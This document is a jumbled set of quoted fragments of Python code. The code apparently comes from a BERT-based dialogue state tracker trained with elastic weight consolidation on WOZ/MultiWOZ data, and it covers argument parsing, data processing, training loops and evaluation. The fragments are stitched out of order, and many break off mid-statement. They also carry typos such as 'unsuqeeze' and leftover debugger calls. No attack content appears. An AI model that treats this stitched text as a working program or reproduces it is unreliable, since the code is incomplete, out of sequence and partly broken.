processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples)", "pretrained model # in the case that slot and values are different between", "% args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer", "-1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader = DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size)", "all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler =", "0 for (ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2])", "= prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _", "_post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples", "1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if", "all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\")", "None prev_nb_dev_examples = 0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device)", "self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous", "TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data)", "data_dir): \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\" raise NotImplementedError() def", "5 for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids", "= [] for (i, line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0],", "and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale == 0:", "BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels, device) if args.fp16: model.half() # Load", "accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See", "type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot idx", "args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n, p in model.named_parameters() if", "= torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b,", "# Slot value labels of Present task label_list = prev_label_list + target_label_list #", "n for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters if", "size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for", "ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name =", "os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard logging if not", "labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id", "ptr_model.keys(): if ('slot' in key) or ('value' in key): del_list.append(key) for key in", "eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]),", "loss_.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_", "* (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len))", "= input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id = prev_label_id # trained", "version).\"\"\" def __init__(self, config): super(Processor, self).__init__() import json if config.data_dir == \"data/woz\" or", "random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not", "input_ids, input_len, label_ids, _ = batch if n_gpu == 1: loss_, loss_slot, acc,", "dev_loss = dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss", "= [(n, p) for n, p in model.named_parameters() if p.requires_grad] no_decay = ['bias',", "if eval_loss_slot is None: # for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0]", "in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer:", "2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens), 0] if", "\\t%.3f\\n\" % total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count) if __name__ ==", "+ args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids,", "n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,", "total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train else None", "initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the", "torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes the distributed backend", "data_dir): \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\" raise NotImplementedError() def", "1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer", "torch.no_grad(): if n_gpu == 1: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len,", "'%s (id = %d) ' % (label, label_map[i][label]) return label_id, label_info features =", "= line[2] + \" # \" + text_a text_b = line[3] + \"", "summary_writer.add_scalar(\"Train/Loss\", loss_, global_step) summary_writer.add_scalar(\"Train/Loss_EWC\", loss_ewc, global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if", "# modify learning rate with special warm up BERT uses lr_this_step = args.learning_rate", "_, pred_slot = model(input_ids, input_len, label_ids, 1) nturn = (label_ids[:,:,0].view(-1) != -1).sum().item() nslot", "2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad(): _,", "from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please", "int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx <", "maximum length.\"\"\" while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length:", "as DDP except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use", "batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for t in batch) input_ids, input_len,", "int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn)", "which will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed", "text_a = line[2] text_b = line[3] prev_dialogue_index = line[0] else: # The symbol", "args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch,", "(prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples +=", "model # in the case that slot and values are different between the", "token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings", "prev_turn_idx - 1) assert len(features) % max_turn_length == 0 all_input_ids = torch.tensor([f.input_ids for", "no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters", "best_loss: # Save a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if", "target slots: '+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return", "for n, p in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters", "\\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\")", "= 'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name)", "input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for x in input_len])) logger.info(\"label: \" +", "state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings label_token_ids, label_len = [], [] for", "in key): # rename rnn -> nbt, rename_list.append(key) for key in del_list: del", "corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model selected in the list: bert-base-uncased,", "if len(line) > 0 and line[0][0] == '#': # ignore comments (starting with", "label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file into a list of", "bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False,", "type=int, help=\"The maximum total input turn length. \\n\" \"Sequences longer than this will", "all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running", "input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu", "del_list.append(key) for key in del_list: del ptr_model[key] if n_gpu > 1: model =", "incorrect_dialogs = [] attention_draw = 5 for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):", "self.input_len = input_len self.label_id = label_id self.prev_label_id = prev_label_id # trained slots in", "action='store_true', help=\"Set this flag if you want to set the label encoder trainable.", "t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers import", "in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return all_label_token_ids,", "acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" %", "== \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology", "= \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler", "+ args.patience <= epoch: if last_update + args.patience <= epoch: break ############################################################################### #", "size for training.\") parser.add_argument(\"--dev_batch_size\", default=1, type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16,", "writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc", "* max_seq_length all_padding_len = [0, 0] max_turn = 0 for (ex_index, example) in", "* warmup_linear(global_step / t_total, args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step)", "prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if n_gpu == 1: if dev_loss_slot is", "all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids,", "max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return", "will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence length after", "(key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and (args.local_rank == -1", "for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] == -1: break", "if ('slot' in key) or ('value' in key): del_list.append(key) for key in del_list:", "'[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account", "acc_slot, nb_eval_ex) prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\", "False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps =", "for slot in range(0, nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\",", "elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for", "== pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10,", "prev_eval_accuracy, prev_eval_acc_slot = \\ _post_process(prev_eval_loss, prev_eval_loss_slot, prev_eval_accuracy, prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot,", "False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10,", "total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if len(tokens_a) >", "a collection of `InputExample`s for the dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets", "args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import", "in key) or ('value' in key): del_list.append(key) for key in del_list: del ptr_model[key]", "DataLoader(train_data, sampler=train_sampler, batch_size=args.train_batch_size) ## Dev ## utterances all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features(", "number of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of", "accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size", "dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models ###############################################################################", "Slot value labels of Present task label_list = prev_label_list + target_label_list # All", "n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot,", "loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ =", "< int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" %", "Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1", "label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_,", "Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example for simple sequence classification.\"\"\" def", "int(len(dev_examples) / args.dev_batch_size * args.num_train_epochs) ## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features(", "target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1)", "[str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())] dialog.append(text) incorrect_dialogs.append(dialog) output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with", "of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model selected in", "model = model.module state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device) ## Get slot-value embeddings", "prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length", "and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The", "Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot value labels of", "torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam except", "__init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len = input_len self.label_id =", "the task to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None,", "for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" %", "label, pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"----------", "prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding,", "\" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained BERT", "that you have fine-tuned ptr_model = torch.load(output_model_file, map_location=device) del_list = [] for key", "len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return 'do not care' if label=='dontcare' else", "= label_id self.prev_label_id = prev_label_id # trained slots in previous tasks class DataProcessor(object):", "trainable. \\n\" \"This option is valid only when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\",", "classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid = guid self.text_a =", "vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s", "epoch: if last_update + args.patience <= epoch: break ############################################################################### # Evaluation ############################################################################### #", "args.local_rank) n_gpu = 1 # Initializes the distributed backend which will take care", "nb_eval_ex if loss_slot is not None: if eval_loss_slot is None: eval_loss_slot = [", "= dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if summary_writer is not", "if eval_loss_slot is None: eval_loss_slot = [ l * nb_eval_ex for l in", "= [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy", "are different between the training and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list =", "EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for", "Save a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu ==", "dialog in incorrect_dialogs: for turn in dialog: text = turn['input'] + '\\t' for", "present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len,", "text_a, text_b=None, label=None, prev_label=None): self.guid = guid self.text_a = text_a self.text_b = text_b", "for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float,", "= convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to(", "% (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not", "== 1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot = prev_dev_acc_slot / prev_nb_dev_examples if", "run analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you", "in reader: if len(line) > 0 and line[0][0] == '#': # ignore comments", "[ {'params': [p for n, p in param_optimizer if not any(nd in n", "for labels in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens)", "None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot,", "parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates", "cbar=False, ax=ax) class_correct = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))]", "Target slots in this training task self.prev_label = prev_label # trained slots in", "else: for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn", "tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step + 1)", "\"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn", "line[2] text_b = line[3] prev_dialogue_index = line[0] else: # The symbol '#' will", "None best_loss = None #### EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id,", "eval_acc_slot += acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy,", "\" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the", "None: dev_loss_slot = [ l * num_valid_turn for l in loss_slot] dev_acc_slot =", "collections import operator from tqdm import tqdm, trange import numpy as np import", "guid, text_a, text_b=None, label=None, prev_label=None): self.guid = guid self.text_a = text_a self.text_b =", "type=str, default=False, help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number of heads in multi-headed attention\")", "n_gpu: {}, distributed training: {}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank != -1),", "args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation)", "min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn) for (ex_index, example) in enumerate(examples): tokens_a", "eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev", "total_acc_slot = {} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val", "tokens_b = None if example.text_b: tokens_b = [x if x != '#' else", "# Account for [CLS] and [SEP] with \"- 2\" if len(tokens_a) > max_seq_length", "batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning rate for Adam.\")", "< max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length -", "[InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) %", "fileHandler = logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting if args.local_rank == -1", "args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters", "= len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert", "prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot = dev_acc_slot / nb_dev_examples prev_dev_acc_slot", "!= '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)", "for i in range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for i", "'+ ', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir,", "max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn) for (ex_index, example) in", "CUDA setting if args.local_rank == -1 or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available()", "optimizer.backward(loss) else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\", loss_,", "n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i],", "dialog: text = turn['input'] + '\\t' for label, pred in zip(turn['label'], turn['pred']): text", "Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1)", "\\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank != -1:", "nb_eval_examples_prev total_acc_slot = {} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] =", "for data converters for sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a", "accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.target_slot]", "target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1)", "accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir,", "in label_list] for i, label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info +=", "value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar)", "idx to train model. ex. '0:1:2 or an excluding slot name 'attraction'\" )", "an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained slots.", "warmup for. \" \"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter", "run eval on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir)", "will be replaced with '[SEP]' after tokenization. text_a = line[2] + \" #", "initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs", "nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu", "loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model)", "os import logging import argparse import random import collections import operator from tqdm", "optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n, p in", "if last_update + args.patience <= epoch: break ############################################################################### # Evaluation ############################################################################### # Test", "line[0][0] == '#': # ignore comments (starting with '#') continue lines.append(line) return lines", "InputFeatures(object): \"\"\"A single set of features of data.\"\"\" def __init__(self, input_ids, input_len, label_id,", "accumulate before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float", "############################################################################### if args.do_train: logger.info(\"Training...\") global_step = 0 last_update = None best_loss = None", "label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index <", "dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples", "data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [", "best_loss = None #### EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels,", "= torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn 